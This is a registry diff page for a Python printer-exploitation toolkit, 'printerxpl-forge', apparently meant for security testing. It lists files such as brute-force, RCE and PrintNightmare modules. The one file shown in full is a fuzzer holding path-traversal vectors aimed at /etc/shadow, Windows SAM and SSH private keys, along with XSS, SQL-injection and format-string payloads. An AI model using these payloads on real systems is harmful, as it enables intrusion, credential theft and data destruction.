PyPI - printerxpl-forge - Versions diffs - 6.2.0__py3-none-any.whl - Mend

printerxpl-forge 6.2.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (97) hide show

nse/README.md +204 -0
nse/__init__.py +6 -0
nse/install_nse.py +412 -0
nse/lib/printerxpl.lua +238 -0
nse/scripts/cups-info.nse +74 -0
nse/scripts/cups-queue-info.nse +43 -0
nse/scripts/hp-printers-cve-2022-1026.nse +121 -0
nse/scripts/http-device-mac.nse +107 -0
nse/scripts/http-hp-ilo-info.nse +121 -0
nse/scripts/http-info-xerox-enum.nse +101 -0
nse/scripts/http-vuln-cve2022-1026.nse +158 -0
nse/scripts/lexmark-config.nse +89 -0
nse/scripts/pjl-ready-message.nse +106 -0
nse/scripts/printer-banner.nse +217 -0
nse/scripts/printer-cups-rce.nse +189 -0
nse/scripts/printer-cve-detect.nse +279 -0
nse/scripts/printer-discover.nse +205 -0
nse/scripts/printer-firmware-exposed.nse +219 -0
nse/scripts/printer-hp-pjl.nse +192 -0
nse/scripts/printer-http-ews.nse +293 -0
nse/scripts/printer-ipp-info.nse +235 -0
nse/scripts/printer-lexmark-ipp.nse +203 -0
nse/scripts/printer-passback.nse +204 -0
nse/scripts/printer-pjl-info.nse +146 -0
nse/scripts/printer-printnightmare.nse +211 -0
nse/scripts/printer-snmp-info.nse +176 -0
nse/scripts/printer-vuln-check.nse +256 -0
nse/scripts/snmp-device-mac.nse +93 -0
nse/scripts/snmp-info.nse +146 -0
nse/scripts/snmp-sysdescr.nse +70 -0
printerxpl_forge-6.2.0.dist-info/METADATA +919 -0
printerxpl_forge-6.2.0.dist-info/RECORD +97 -0
printerxpl_forge-6.2.0.dist-info/WHEEL +5 -0
printerxpl_forge-6.2.0.dist-info/entry_points.txt +4 -0
printerxpl_forge-6.2.0.dist-info/licenses/LICENSE +21 -0
printerxpl_forge-6.2.0.dist-info/top_level.txt +4 -0
src/assets/fonts/gunplay.pfa +1671 -0
src/assets/fonts/kshandwrt.pfa +315 -0
src/assets/fonts/laksoner.pfa +2402 -0
src/assets/fonts/paintcans.pfa +9699 -0
src/assets/fonts/stencilod.pfa +4076 -0
src/assets/fonts/takecover.pfa +26138 -0
src/assets/fonts/topsecret.pfa +6652 -0
src/assets/fonts/whoa.pfa +773 -0
src/assets/mibs/HOST-RESOURCES-MIB +1540 -0
src/assets/mibs/Printer-MIB +4389 -0
src/assets/mibs/README.md +9 -0
src/assets/mibs/SNMPv2-MIB +854 -0
src/assets/overlays/hacker.eps +596 -0
src/assets/overlays/smiley.eps +214 -0
src/assets/overlays/smiley2.eps +240 -0
src/core/attack_orchestrator.py +1025 -0
src/core/capabilities.py +323 -0
src/core/destructive_audit.py +430 -0
src/core/discovery.py +488 -0
src/core/osdetect.py +74 -0
src/core/poly_runner.py +579 -0
src/core/printer.py +1426 -0
src/main.py +2134 -0
src/modules/install_printer.py +318 -0
src/modules/login_bruteforce.py +852 -0
src/modules/pcl.py +506 -0
src/modules/pjl.py +3575 -0
src/modules/print_job.py +1290 -0
src/modules/ps.py +1102 -0
src/payloads/__init__.py +98 -0
src/payloads/assets/overlays/notice.eps +9 -0
src/protocols/__init__.py +19 -0
src/protocols/firmware.py +738 -0
src/protocols/ipp.py +216 -0
src/protocols/ipp_attacks.py +609 -0
src/protocols/lpd.py +141 -0
src/protocols/network_map.py +1004 -0
src/protocols/raw.py +173 -0
src/protocols/smb.py +359 -0
src/protocols/ssrf_pivot.py +427 -0
src/protocols/storage.py +587 -0
src/ui/__init__.py +6 -0
src/ui/interactive.py +742 -0
src/ui/spinner.py +112 -0
src/ui/tables.py +132 -0
src/utils/banner_grabber.py +852 -0
src/utils/codebook.py +456 -0
src/utils/config.py +522 -0
src/utils/cve_loader.py +158 -0
src/utils/default_creds.py +134 -0
src/utils/discovery_online.py +1327 -0
src/utils/exploit_manager.py +805 -0
src/utils/fuzzer.py +220 -0
src/utils/helper.py +732 -0
src/utils/local_printers.py +307 -0
src/utils/ml_engine.py +491 -0
src/utils/operators.py +474 -0
src/utils/ports.py +234 -0
src/utils/vuln_scanner.py +823 -0
src/utils/wordlist_loader.py +412 -0
src/version.py +36 -0

src/utils/fuzzer.py ADDED Viewed

@@ -0,0 +1,220 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+Fuzzer Module - Path and Data Fuzzing for Printer Security Testing
+Provides fuzzing vectors for file system testing, path traversal, and vulnerability discovery
+"""
+# Author    : Andre Henrique (@mrhenrike)
+# GitHub    : https://github.com/mrhenrike
+# LinkedIn  : https://linkedin.com/in/mrhenrike
+# X/Twitter : https://x.com/mrhenrike
+class fuzzer():
+    """
+    Fuzzer class with static lists and dynamic generators for security testing
+    """
+    # Volume prefixes (printer volumes and drive letters)
+    vol = ["", ".", "\\", "/", "file:///", "C:/", "D:/", "E:/", "F:/", "G:/", "H:/", "I:/", "J:/", "K:/", "L:/", "M:/", "N:/", "O:/", "P:/", "Q:/", "R:/", "S:/", "T:/", "U:/", "V:/", "W:/", "X:/", "Y:/", "Z:/", "0:/", "1:/", "2:/", "3:/", "4:/", "5:/", "6:/", "7:/", "8:/", "9:/"]
+    # Environment variables (Unix-like)
+    var = ["~", "$HOME", "$USER", "$PATH", "$PWD", "$TEMP", "$TMP", "$TMPDIR", "$HOME/.config", "$HOME/.local/share"]
+    # Windows environment variables
+    win = ["%WINDIR%", "%SYSTEMROOT%", "%HOMEPATH%", "%PROGRAMFILES%", "%PROGRAMFILES(X86)%", "%APPDATA%", "%LOCALAPPDATA%", "%TEMP%", "%TMP%", "%USERPROFILE%", "%SYSTEMDRIVE%"]
+    # SMB/UNC paths
+    smb = ["\\\\127.0.0.1\\", "\\\\localhost\\", "\\\\smb\\", "\\\\samba\\", "\\\\fileserver\\", "\\\\share\\", "\\\\printer\\", "\\\\printserver\\", "\\\\networkshare\\"]
+    # Web paths (HTTP)
+    web = ["http://127.0.0.1/", "http://localhost/", "http://smb/", "http://samba/", "http://fileserver/", "http://share/", "http://printer/", "http://printserver/", "http://networkshare/"]
+    # Directory traversal patterns
+    dir = ["..", "...", "....", "../..", "../../..", "../../../..", "../../../../..", "../../../../../..", "../../../../../../..", "../../../../../../../.."]
+    # Path separators
+    sep = ["", "\\", "/", "\\\\", "//", "\\/", "/\\"]
+    # Filesystem hierarchy standard (Unix/Linux)
+    fhs = ["/etc", "/bin", "/sbin", "/home", "/proc", "/dev", "/lib",
+           "/opt", "/run",  "/sys", "/tmp", "/usr", "/var",  "/mnt", "/srv",
+           "/boot", "/root", "/media", "/lib64", "/lib32", "/usr/local",
+           "/usr/share", "/usr/lib", "/usr/bin", "/usr/sbin", "/usr/libexec",
+           "/usr/include", "/usr/src", "/usr/local/bin", "/usr/local/sbin",
+           "/usr/local/lib", "/usr/local/include", "/usr/local/share"]
+    # Absolute paths to test
+    abs = [".profile", ["etc", "passwd"], ["bin", "sh"], ["bin", "ls"],
+           "boot.ini", ["windows", "win.ini"], ["windows", "cmd.exe"]]
+    # Relative Windows paths
+    rel = ["%WINDIR%\\win.ini",
+           "%WINDIR%\\repair\\sam",
+           "%WINDIR%\\repair\\system",
+           "%WINDIR%\\system32\\config\\system.sav",
+           "%WINDIR%\\System32\\drivers\\etc\\hosts",
+           "%SYSTEMDRIVE%\\boot.ini",
+           "%USERPROFILE%\\ntuser.dat",
+           "%SYSTEMDRIVE%\\pagefile.sys",
+           "%SYSTEMROOT%\\repair\\sam",
+           "%SYSTEMROOT%\\repair\\system"]
+    # Combined prefixes for different fuzzing modes
+    path = vol+var+win+smb+web  # path fuzzing
+    write = vol+var+win+smb+fhs  # write fuzzing
+    blind = vol+var             # blind fuzzing
+    # ====================================================================
+    # DYNAMIC FUZZING METHODS
+    # ====================================================================
+    def fuzz_paths(self):
+        """
+        Generate comprehensive list of fuzzing paths
+        Combines volumes, directories, separators for path traversal testing
+        """
+        paths = []
+        # Basic paths
+        paths.extend(self.path)
+        # Traversal combinations (vol + traversal + separator)
+        for v in self.vol[:10]:  # Focus on common volumes
+            for d in self.dir[:5]:  # Common traversal depths
+                for s in self.sep[:3]:  # Common separators
+                    if v and d:
+                        paths.append(v + s + d)
+        # Common sensitive files with traversal
+        sensitive = [
+            "../../../etc/passwd",
+            "../../etc/shadow",
+            "../../../proc/version",
+            "../../rw/var/sys/passwd",
+            "..\\..\\..\\windows\\system32\\config\\sam",
+            "../../../boot.ini",
+            "0:/../../../etc/passwd",
+            "1:/../../etc/shadow",
+        ]
+        paths.extend(sensitive)
+        # Filesystem hierarchy
+        paths.extend(self.fhs)
+        return paths
+    def fuzz_names(self):
+        """
+        Generate fuzzing filenames for testing
+        Returns list of potentially sensitive or dangerous filenames
+        """
+        names = [
+            # Hidden files
+            ".htaccess", ".htpasswd", ".profile", ".bashrc", ".ssh",
+            # Configuration files
+            "passwd", "shadow", "config.xml", "config.cfg", "device.cfg",
+            "settings.ini", "printer.cfg", "network.xml",
+            # Traversal attempts
+            "../../../etc/passwd",
+            "..\\..\\..\\windows\\system32\\config\\sam",
+            # Script files
+            "test.ps", "test.pcl", "exploit.ps", "backdoor.ps",
+            "malicious.pdf", "payload.eps",
+            # System files
+            "boot.ini", "win.ini", "hosts", "resolv.conf",
+            # Special characters
+            "file with spaces.txt",
+            "file;with;semicolons.txt",
+            "file|with|pipes.txt",
+            "file&with&ampersands.txt",
+            # Long names (overflow testing)
+            "A" * 255,
+            "B" * 1000,
+        ]
+        return names
+    def fuzz_data(self, size='small'):
+        """
+        Generate fuzzing data payloads
+        Args:
+            size: 'small', 'medium', 'large', or 'huge'
+        Returns:
+            bytes object with fuzzing payload
+        """
+        sizes = {
+            'small': 1000,
+            'medium': 10000,
+            'large': 100000,
+            'huge': 1000000
+        }
+        length = sizes.get(size, 1000)
+        payloads = []
+        # Buffer overflow patterns
+        payloads.append(b"A" * length)
+        payloads.append(b"B" * length)
+        # Null bytes
+        payloads.append(b"\x00" * (length // 10))
+        # Format string attacks
+        payloads.append(b"%s" * (length // 10))
+        payloads.append(b"%x" * (length // 10))
+        payloads.append(b"%n" * (length // 10))
+        # Special characters
+        payloads.append(b"<script>alert('XSS')</script>" * (length // 100))
+        payloads.append(b"'; DROP TABLE printers; --" * (length // 100))
+        # Binary patterns
+        payloads.append(bytes(range(256)) * (length // 256))
+        # Return first payload (can be extended to return all)
+        return payloads[0]
+    def fuzz_traversal_vectors(self):
+        """
+        Generate specific path traversal attack vectors
+        Returns list of path traversal attempts
+        """
+        vectors = []
+        # Unix/Linux traversal (multiple depths)
+        for depth in range(1, 10):
+            prefix = "../" * depth
+            targets = ["etc/passwd", "etc/shadow", "proc/version", "root/.ssh/id_rsa"]
+            for target in targets:
+                vectors.append(prefix + target)
+        # Windows traversal
+        for depth in range(1, 10):
+            prefix = "..\\" * depth
+            targets = ["windows\\system32\\config\\sam", "boot.ini", "windows\\win.ini"]
+            for target in targets:
+                vectors.append(prefix + target)
+        # Volume-based traversal (printer-specific)
+        for vol in ["0:", "1:", "2:"]:
+            for depth in range(1, 6):
+                prefix = "/../" * depth
+                vectors.append(vol + prefix + "etc/passwd")
+                vectors.append(vol + prefix + "rw/var/sys/passwd")
+        # Embedded systems specific
+        vectors.extend([
+            "../../rw/var/sys/passwd",
+            "../../../mnt/flash/config",
+            "../../opt/printer/config.xml",
+        ])
+        return vectors